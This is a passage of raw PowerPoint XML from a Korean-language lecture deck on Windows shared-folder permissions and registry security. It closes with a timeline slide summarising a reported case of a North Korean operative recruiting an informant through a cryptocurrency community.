                        <a:pt x="591" y="161"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="171"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="603" y="182"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="171"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="595" y="161"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="589" y="149"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="583" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="578" y="127"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="117"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="569" y="105"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="564" y="94"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="561" y="87"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="555" y="80"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="552" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="547" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="544" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="538" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="532" y="47"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="532" y="33"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="538" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="544" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="549" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="547" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="544" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="540" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="538" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="532" y="7"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="523" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="521" y="15"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="515" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="513" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="25"/>
                      </a:lnTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:ln w="9525" cap="rnd" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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ko-KR" altLang="en-US"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</p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="AutoShape 61"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="801"/>
              <a:ext cx="1809" cy="543"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 42963"/>
                <a:gd name="adj2" fmla="val 42074"/>
                <a:gd name="adj3" fmla="val 57700"/>
                <a:gd name="adj4" fmla="val 77005"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill rotWithShape="0">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="CCECFF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="CCECFF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B2B2B2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" latinLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" b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공유폴더</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" latinLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" b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권한</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 62"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2426" y="1344"/>
              <a:ext cx="1414" cy="2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 algn="ctr" eaLnBrk="0" latinLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" b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읽기</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 63"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2426" y="1583"/>
              <a:ext cx="1414" cy="2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 algn="ctr" eaLnBrk="0" latinLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr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변경</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 64"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2426" y="1823"/>
              <a:ext cx="1414" cy="24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71842" dir="2700000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="B2B2B2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" latinLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" b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모든권한</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 65"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2265" y="1154"/>
              <a:ext cx="686" cy="309"/>
              <a:chOff x="4491" y="808"/>
              <a:chExt cx="664" cy="300"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="Freeform 66"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4491" y="808"/>
                <a:ext cx="664" cy="300"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="387" y="144"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="359" y="119"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="340" y="75"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="311" y="32"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="275" y="8"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="229" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="186" y="19"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="150" y="55"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="124" y="109"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="81" y="123"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="46" y="143"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="18" y="174"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="4" y="207"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="1" y="241"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="10" y="272"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="25" y="293"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="45" y="312"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="74" y="330"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="105" y="342"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="129" y="362"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="145" y="395"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="165" y="419"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="189" y="440"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="217" y="452"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="253" y="454"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="291" y="438"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="320" y="415"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="347" y="381"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="365" y="353"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="380" y="294"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="723" y="240"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="747" y="312"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="723" y="360"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="795" y="408"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="795" y="312"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="867" y="288"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="939" y="408"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="915" y="360"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="939" y="312"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="987" y="240"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="998" y="225"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="1001" y="203"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="1000" y="171"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="992" y="149"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1003" h="456">
                    <a:moveTo>
                      <a:pt x="987" y="144"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="387" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="795" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="795" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="795" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="795" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="867" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="867" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="939" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="939" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="915" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="915" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="939" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="939" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="987" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="994" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="998" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1000" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1001" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1003" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1000" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="997" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="992" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="987" y="14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9900">
                      <a:gamma/>
                      <a:tint val="53725"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FF9900"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="6350" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx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tx1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24" name="Oval 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4534" y="815"/>
                <a:ext cx="158" cy="28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tIns="27432" bIns="27432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sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Text Box 68"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="711" y="2046"/>
              <a:ext cx="42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kumimoji="0" lang="en-US" altLang="ko-KR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  <a:endParaRPr kumimoji="0"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2004368" y="1891550"/>
            <a:ext cx="7194550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latinLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="6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ko-KR" altLang="en-US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공유폴더의</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0"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권한은 누적된다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0"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 latinLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="6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변경권한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권한변경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및 소유권 변경은 안된다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kumimoji="0"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latinLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="6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kumimoji="0"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거부</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0"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(Deny) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" latinLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="6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</a:pPr>
            <a:r>
              <a:rPr kumimoji="0"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권한에 우선</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" latinLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="6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ü"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0"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꼭 필요할 때만 부여</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR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latinLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="6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endParaRPr kumimoji="0"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32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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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(Registry)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7194550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등기소 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(registry) : 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정보를 담고 있는 데이터베이스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레지스트리의 내용을 보려면 레지스트리 편집기를 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5" y="3080270"/>
            <a:ext cx="76104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9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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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(Registry)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82089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윈도우즈는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사용자와 시스템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디렉토리의 모든 정보를 분류해서 저장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윈도우즈의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 정보의 데이터베이스와 같은 역할을 수행하며 실시간으로 사용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69" y="3356993"/>
            <a:ext cx="7313612" cy="3293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877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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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(Registry)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82089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윈도우즈는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사용자와 시스템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디렉토리의 모든 정보를 분류해서 저장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윈도우즈의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 정보의 데이터베이스와 같은 역할을 수행하며 실시간으로 사용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69" y="3356993"/>
            <a:ext cx="7313612" cy="3293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482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99934" y="1124744"/>
            <a:ext cx="8291264" cy="35394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이론 및 일반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ko-KR" altLang="en-US" sz="16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개요</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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기능 및 구조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정보시스템의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자원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 자원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최대한 효율적으로 관리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운영함으로써    사용자들에게 편의성을 제공하고자 하드웨어와 사용자 프로그램 사이에 존재하는 시스템 프로그램으로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인터페이스 제공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향상 등 한정된 자원을 효율적으로 사용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517" y="3922017"/>
            <a:ext cx="5781675" cy="29359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864FC6-9519-4061-9D05-2E49BFB6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91" y="3922017"/>
            <a:ext cx="2541421" cy="28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25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 보안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82089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레지스트리에는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모든 정보가 담겨 있어 레지스트리가 불법적으로 수정 된다든지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 값이 삭제가 되면 시스템에 치명적인 영향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레지스트리의 보안은 단단한 시스템을 유지하기 위해서 필수적인 요소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인가되지 않은 사용자나 권한이 없는 사용자의 접근을 근본적으로 차단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hlinkClick r:id="rId4"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E312D33-E484-4532-81B0-59A5CC79E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114" y="3158615"/>
            <a:ext cx="5645911" cy="33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7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526CE31-63F2-4F10-AE5E-DF650F6037E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553452" y="874295"/>
            <a:ext cx="1108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0B6DB07-F08F-4A42-96EA-AD4785163D8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1973178" y="753979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DC39F-5688-4D5B-BDD4-9CDCFAB3F764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553452" y="1195138"/>
            <a:ext cx="3080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이씨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(38)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는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암호화폐 커뮤니티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에서 북한 공작원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A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씨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와 친해짐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1E3E954-0192-46F3-B36E-994263A81C98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325978" y="772344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62799-FEA3-4BF7-BF62-585136445056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3906252" y="1213503"/>
            <a:ext cx="3080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두 차례에 걸쳐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비트코인 등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60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만 달러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(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약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7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억원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)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가량의 암호화페를 받고 포섭</a:t>
            </a:r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67A99F-7E72-4EE2-9EB5-A0ABBF920A87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8791074" y="772344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4B3ED-BAA5-4926-8038-7626C85FC71C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7371348" y="1213503"/>
            <a:ext cx="3080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A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씨로부터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군사기밀 탐지에 필요한 현역 장교를 포섭하라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는 지령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45EE4-667C-40DC-B7D4-2C7D59D175C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684420" y="333672"/>
            <a:ext cx="8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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>년전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DAF43-D151-4B5E-B0F3-473F250559D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5037220" y="304801"/>
            <a:ext cx="8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2-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>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28812-0325-4332-8097-E791EB91CCA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8594558" y="30713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CD3E7E-9377-42AE-90E2-309EC7A5CD0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553451" y="3064042"/>
            <a:ext cx="1108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8A0B8912-0621-489F-A6D8-B966DD234390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1949116" y="2959759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5B129-3BE0-493B-B391-BAF9ED5FEE73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="2494548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F9E8E4-8AF9-4311-A62E-28BA005170D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553452" y="3315151"/>
            <a:ext cx="308008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현역 장교에게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"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군사 기밀을 제공해주면 암호화폐 등 대가를 지급하겠다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"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는 취지로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포섭을 시도했으나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대상 장교가 거절해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실패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CF85D1F-ADA5-4BCC-9F3F-3E4E991F0D96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8911389" y="2901805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E5F14E-4759-4DAD-8DDE-07469CCE6C1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8714873" y="222002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BEE81-A5F9-4E42-A92F-6C454BAFD4A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7491663" y="3317485"/>
            <a:ext cx="308008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암호화폐 커뮤니티에서 만난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B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대위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연락처를 이씨에게 전달하여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A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씨 지령에 따라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손목시계형 몰래카메라를 구입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하여 현역 장교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B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대위에게 택배로 발송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0633B1B-B374-4F6C-8545-488A34E196F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309936" y="2943726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8D8972-56AD-4CEE-A403-63313326ECC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5113420" y="2478515"/>
            <a:ext cx="7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DEF58-B25B-43EA-AEC2-F5B1BD457319}"/>
              </a:ext>
            </a:extLst>
